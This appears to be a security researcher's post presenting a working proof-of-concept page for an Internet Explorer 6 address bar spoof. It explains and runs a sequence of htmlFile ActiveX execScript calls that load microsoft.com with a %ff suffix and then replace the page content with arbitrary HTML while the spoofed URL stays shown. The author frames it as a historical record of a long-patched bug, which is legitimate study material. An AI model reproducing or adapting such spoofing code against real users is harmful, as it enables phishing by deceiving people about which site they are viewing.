This address bar spoof for IE6 uses the htmlFile ActiveX to call window.open via execScript, which unlocks a navigation path that isn’t available when called directly from a page script. The sequence opens a window to an invalid URL, then navigates it to a real URL with a %ff suffix, and finally replaces its content with arbitrary HTML — all while the address bar shows the spoofed URL.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE> AddressBar Spoof for IE6</TITLE></HEAD>
<BODY>
<FONT FACE="Tahoma" SIZE="2">
Here's a little AddressBar Spoof that works on IE6. <INPUT TYPE="BUTTON" ONCLICK="spoofNow()" VALUE="Open Spoofed Window"><BR><BR>
1) create an ActiveXObject <B>htmlFile</B> [CLSID: 25336920-03F9-11CF-8FD0-00AA00686F13].<BR>
<FONT COLOR="BLUE">var obj=new ActiveXObject('htmlFile');</FONT><BR><BR>
2) Regular window.open with an INVALID URL. The name of the window -in this case- is "mySpoof".<BR>
<FONT COLOR="BLUE">window.open("invalid:url","mySpoof");</FONT><BR><BR>
3) Now we use the window.open method <U>from the activeX using the same window name</U> and load the "desired" URL plus %ff.<BR>
<FONT COLOR="BLUE">obj.Script.execScript('window.open("http://www.microsoft.com%ff","mySpoof")');</FONT><BR><BR>
4) Finally, we do another window.open from the activeX using the javascript: "protocol", that -normally- should not work. In fact, it only works
doing all this jazz (activeX and execScript). If you open the window from the main document, it won't work.<BR>
<FONT COLOR="BLUE">obj.Script.execScript('window.open("javascript:void(document.body.innerHTML=\'<B>Microsoft WebPage is under construction</B> :P\')","mySpoof")');</FONT>
<BR><BR>
<SCRIPT LANGUAGE="JavaScript">
var obj=new ActiveXObject('htmlFile');
function waitToExecuteInnerHTML(){
// We wait a little to make sure that the Spoofed URL has been loaded. I mean, RES the error page.
obj.Script.execScript('window.open("javascript:void(document.body.innerHTML=\'<B>Microsoft WebPage is under construction</B> :P\')","mySpoof")');
}
function spoofNow(){
window.open("invalid:url","mySpoof");
obj.Script.execScript('window.open("http://www.microsoft.com%ff","mySpoof")');
setTimeout('waitToExecuteInnerHTML()',1000);
}
</SCRIPT>
Important: if you call the open method without doing the execScript, it does not work: <FONT COLOR="BLUE">obj.Script.execScript('window.open()')</FONT> should
be pretty much the same as doing <FONT COLOR="BLUE">obj2.Script.open()</FONT>. However, using the last method it will not work at all.<BR>
This little trick works with a lot of activeX controls. One of them is the TriEditDocument.TriEditDocument.1 [438DA5E0-F171-11D0-984E-0000F80270F8]. If you want the full
list of the activeX controls that allow this method, let me know.<BR>
Go ahead, click the <B>Open Spoofed Window</B> button at the top of the page.
</FONT>
</BODY>
</HTML>The %ff suffix appended to the URL causes IE6 to display an error page while keeping the address bar showing the original URL. The javascript: navigation through the ActiveX’s execScript then replaces the page content. Calling window.open directly with a javascript: URL doesn’t work — it only works when routed through the ActiveX’s script context, which has a different trust level in IE6’s security model.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.